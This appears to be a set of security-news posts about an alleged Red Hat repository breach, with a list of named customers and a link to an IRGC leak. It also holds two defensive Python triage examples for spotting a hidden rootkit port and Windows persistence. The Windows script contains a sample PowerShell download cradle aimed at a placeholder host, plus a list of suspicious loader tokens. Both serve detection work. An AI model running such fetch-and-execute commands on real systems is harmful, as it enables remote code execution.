Published: October 1, 2025

‼️🚨 Red Hat breached: Crimson Collective stole 28k private repositories, including credentials, CI/CD secrets, pipeline configs, VPN profiles, and infrastructure blueprints. Our analysis of obtained data: 👇


The file tree includes thousands of repositories referencing major banks, telecoms, airlines, and public-sector organizations, such as Citi, Verizon, Siemens, Bosch, JPMC, HSBC, Merrick Bank, Telstra, Telefonica, and even mentions the U.S. Senate...

What's in the file tree dump? Inventories, hosts, Ansible playbooks, OpenShift install blueprints, CI/CD runners, VPN profiles, Quay/registry configs, Vault integrations, backups, and exported GitHub/GitLab configs.

The threat actor attempted to contact Red Hat, and the reply is concerning...


Multiple staff were added to the ticket, visible to the threat actor, indicating an OpSec failure.


The threat actor told us that Red Hat is ignoring them and no longer responding to communication attempts.

Some example files: (screenshots in the original thread)

Some of the customers being mentioned in the file tree:

| Company | X Handle |
|---------|----------|
| 3M | @3M |
| Accenture | @Accenture |
| Adeo | No official X handle found |
| Adobe | @Adobe |
| ADP | @ADP |
| Alaska Airlines | @AlaskaAir |
| Ally | @Ally |
| Amadeus |
| AXA | @AXA |
| Bank of America | @BankofAmerica |
| BBVA | @bbva |
| BNP Paribas | @BNPParibas |
| BNSF Railway | @BNSFRailway |
| Boeing | @Boeing |
| Bosch | @BoschGlobal |
| Capgemini | @Capgemini |
| Cisco | @Cisco |
| Citi | @Citi |
| Cummins | @Cummins |
| Deloitte |
| Ericsson | @ericsson |
| Experian | @Experian |
| Federal Aviation Administration (FAA) | @FAANews |
| Federal Emergency Management Agency (FEMA) | @fema |
| Finanz Informatik | @FI_FFM |
| Finastra | @FinastraFS |
| Garanti BBVA | @GarantiBBVA |
| HSBC | @HSBC |
| IBM | @IBM |
| Migros | @migros |
| Mizuho | No official X handle found |
| National Australia Bank | @nab |
| National Institute of Standards and Technology (NIST) | @NIST |
| National Security Agency (NSA) | @NSAGov |
| Nestlé | @Nestle |
| Nokia | @nokia |
| NSW Police | @nswpolice |
| NTT

This appears to be a significant breach based on the information obtained. Without access to the full archive, we cannot determine the full scope of the alleged breach. We have contacted Red Hat for comment.

There is someone exposing IRGC (Islamic Revolutionary Guard Corps) stuff on GitHub. I'm not an IRGC geopolitical nerd, so I can't assess the value of the content. However, if you know what the fuck is going on, maybe you'll find it interesting: https://github.com/KittenBuste...

Kids who used this tool back in the day are now kernel-level cheat developers, reverse engineers & malware developers lol ....


A secret to finding stealth rootkits on Linux is asking the same question multiple ways to see if the answers match. These inconsistencies can reveal the malware. Here we have a rootkit that hid its port from lsof, but ss shows something with a missing owner process.

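The cross-check described in the tweet, written out as an added example (this is not code from the thread author): the same question, "which TCP ports are listening and who owns them?", is asked of `/proc/net/tcp`, of `ss -lntp` (which gets its socket list over netlink and only walks `/proc/<pid>/fd` to fill in the owner) and of `lsof -nP -iTCP -sTCP:LISTEN` (which depends entirely on walking `/proc/<pid>/fd`), and any disagreement is reported. The three command outputs below are constructed samples that reproduce the symptom from the screenshot: a listener on 31337 that `lsof` does not show at all and that `ss` shows with an empty process column, which is what a userland rootkit that filters `/proc` directory listings typically produces.

```python
"""Cross-check three views of listening TCP sockets and flag disagreements.

Constructed sample data stands in for the output of `cat /proc/net/tcp`,
`ss -lntp` and `lsof -nP -iTCP -sTCP:LISTEN` on a live host; on a real
investigation, feed the captured command output into the same functions.
"""
import re

# Constructed sample: /proc/net/tcp. Ports are hex; state 0A is TCP_LISTEN.
# Row 3 is an ESTABLISHED connection and must be ignored by the parser.
PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 20351 1 0000000000000000 100 0 0 10 0
   1: 0100007F:0035 00000000:0000 0A 00000000:00000000 00:00000000 00000000   101        0 18222 1 0000000000000000 100 0 0 10 0
   2: 00000000:7A69 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 44010 1 0000000000000000 100 0 0 10 0
   3: 0100007F:0016 0100007F:A2F1 01 00000000:00000000 00:00000000 00000000     0        0 20400 1 0000000000000000 20 4 30 10 -1
"""

# Constructed sample: `ss -lntp`. The 31337 listener has no users:(...) column.
SS_LNTP = """\
State   Recv-Q  Send-Q  Local Address:Port  Peer Address:Port  Process
LISTEN  0       128     0.0.0.0:22          0.0.0.0:*          users:(("sshd",pid=812,fd=3))
LISTEN  0       4096    127.0.0.1:53        0.0.0.0:*          users:(("systemd-resolve",pid=540,fd=13))
LISTEN  0       128     0.0.0.0:31337       0.0.0.0:*
"""

# Constructed sample: `lsof -nP -iTCP -sTCP:LISTEN`. Port 31337 is absent.
LSOF_LISTEN = """\
COMMAND   PID            USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
sshd      812            root    3u  IPv4  20351      0t0  TCP *:22 (LISTEN)
systemd-r 540 systemd-resolve   13u  IPv4  18222      0t0  TCP 127.0.0.1:53 (LISTEN)
"""

SS_OWNER = re.compile(r'users:\(\("([^"]+)",pid=(\d+)')


def parse_proc_net_tcp(text):
    """Return {port: inode} for every socket in state 0A (LISTEN)."""
    listening = {}
    for line in text.splitlines()[1:]:          # skip the column header
        f = line.split()
        if len(f) < 10 or f[3] != "0A":
            continue
        port = int(f[1].rsplit(":", 1)[1], 16)  # local_address is ip:port in hex
        listening[port] = int(f[9])             # socket inode
    return listening


def parse_ss(text):
    """Return {port: (command, pid) or None} for LISTEN rows of `ss -lntp`."""
    listening = {}
    for line in text.splitlines():
        f = line.split()
        if not f or f[0] != "LISTEN":
            continue
        port = int(f[3].rsplit(":", 1)[1])      # Local Address:Port column
        m = SS_OWNER.search(line)
        listening[port] = (m.group(1), int(m.group(2))) if m else None
    return listening


def parse_lsof(text):
    """Return {port: (command, pid)} for rows of `lsof ... -sTCP:LISTEN`."""
    listening = {}
    for line in text.splitlines():
        if "(LISTEN)" not in line:
            continue
        f = line.split()
        port = int(f[-2].rsplit(":", 1)[1])     # NAME column, e.g. "*:22"
        listening[port] = (f[0], int(f[1]))
    return listening


def cross_check(proc_text, ss_text, lsof_text):
    """Return {port: [reasons]} for every port on which the three views disagree."""
    proc, ss, lsof = parse_proc_net_tcp(proc_text), parse_ss(ss_text), parse_lsof(lsof_text)
    suspicious = {}
    for port in sorted(set(proc) | set(ss) | set(lsof)):
        reasons = []
        if port in proc and port not in ss:
            reasons.append("in /proc/net/tcp but hidden from ss")
        if port in ss and port not in proc:
            reasons.append("in ss (netlink) but hidden from /proc/net/tcp")
        if port in proc and port not in lsof:
            reasons.append("in /proc/net/tcp but hidden from lsof")
        if ss.get(port, "absent") is None:      # LISTEN row with an empty Process column
            reasons.append("ss shows LISTEN with no owning process")
        if reasons:
            suspicious[port] = reasons
    return suspicious


if __name__ == "__main__":
    for port, reasons in cross_check(PROC_NET_TCP, SS_LNTP, LSOF_LISTEN).items():
        print(f"port {port}: " + "; ".join(reasons))
```

Only ports 22 and 53 agree across all three sources; 31337 is reported twice, once because `lsof` cannot see it and once because `ss` cannot name its owner. The kernel-side socket table is the ground truth here, so a port that appears in `/proc/net/tcp` or over netlink but is missing from the process-walking tools is the inconsistency worth chasing (start with the inode: `find /proc/*/fd -lname 'socket:[44010]'`).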

While investigating NTUSER.DAT and SYSTEM registry hives, I uncovered malware persistence via obfuscated PowerShell in Run keys and a fake svchost.exe scheduled as a hidden task. YARA signatures identified the payload as a variant of AresLoader.

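A triage pass over the two persistence mechanisms named in the tweet, as an added example that is not the author's own tooling: Run-key values are scanned for a PowerShell `-EncodedCommand` argument (base64 of UTF-16LE), decoded, and checked for the usual loader tokens, and scheduled-task definitions are checked for an `svchost.exe` that runs from outside `System32`/`SysWOW64` or is flagged hidden. It assumes the Run-key values and task definitions have already been pulled out of the hives (with RegRipper, `reg query` on a mounted hive, or a hive-parsing library); the values below are constructed for the example and the encoded payload is a harmless download cradle pointing at a reserved `.invalid` host. Nothing here identifies a malware family; that is what the YARA step in the tweet is for.

```python
"""Triage extracted Run-key values and scheduled-task definitions for persistence.

Inputs are constructed samples; in practice they come from the NTUSER.DAT and
SOFTWARE/SYSTEM hives and the Tasks folder, not from this script.
"""
import base64
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the common ones.
ENCODED_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
SUSPICIOUS_TOKENS = ("IEX", "Invoke-Expression", "DownloadString", "FromBase64String",
                     "-WindowStyle Hidden", "-ExecutionPolicy Bypass", "-NoProfile")
# The only two locations a legitimate svchost.exe should run from.
SYSTEM_SVCHOST = (r"c:\windows\system32\svchost.exe", r"c:\windows\syswow64\svchost.exe")

# Constructed sample payload, encoded the way `powershell -EncodedCommand` expects it.
SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
ENCODED = base64.b64encode(SCRIPT.encode("utf-16-le")).decode("ascii")

# Constructed sample: values under HKCU\Software\Microsoft\Windows\CurrentVersion\Run.
RUN_VALUES = {
    "OneDrive": r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "WinUpdate": "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand " + ENCODED,
}

# Constructed sample: scheduled tasks reduced to the fields the check needs.
TASKS = [
    {"name": r"\Microsoft\Windows\WindowsUpdate\Scheduled Start",
     "command": r"C:\Windows\System32\svchost.exe", "args": "-k netsvcs", "hidden": False},
    {"name": r"\Windows Host Service",
     "command": r"C:\Users\Public\Libraries\svchost.exe", "args": "", "hidden": True},
]


def decode_encoded_command(cmdline):
    """Return the decoded script if cmdline carries -EncodedCommand, else None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode("utf-16-le")


def triage_run_values(values):
    """Return one finding per Run value that is encoded or carries a suspicious token."""
    findings = []
    for name, cmd in values.items():
        decoded = decode_encoded_command(cmd)
        text = cmd + (" " + decoded if decoded else "")   # search the decoded script too
        hits = [t for t in SUSPICIOUS_TOKENS if t.lower() in text.lower()]
        if decoded is not None or hits:
            findings.append({"value": name, "decoded": decoded, "indicators": hits})
    return findings


def triage_tasks(tasks):
    """Return one finding per task whose svchost.exe is misplaced or which is hidden."""
    findings = []
    for t in tasks:
        exe = t["command"].lower()
        reasons = []
        if exe.endswith("\\svchost.exe") and exe not in SYSTEM_SVCHOST:
            reasons.append("svchost.exe outside System32/SysWOW64")
        if t["hidden"]:
            reasons.append("task is hidden")
        if reasons:
            findings.append({"task": t["name"], "command": t["command"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in triage_run_values(RUN_VALUES):
        print(f"Run\\{f['value']}: {f['indicators']}\n  decoded: {f['decoded']}")
    for f in triage_tasks(TASKS):
        print(f"{f['task']} -> {f['command']}: {'; '.join(f['reasons'])}")
```

The decode step matters more than the token list: `IEX` and `DownloadString` are invisible in the hive until the UTF-16LE base64 is unpacked, and a second base64 layer inside the decoded script (`FromBase64String`) is common, so the indicator list is written to catch that hand-off too.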
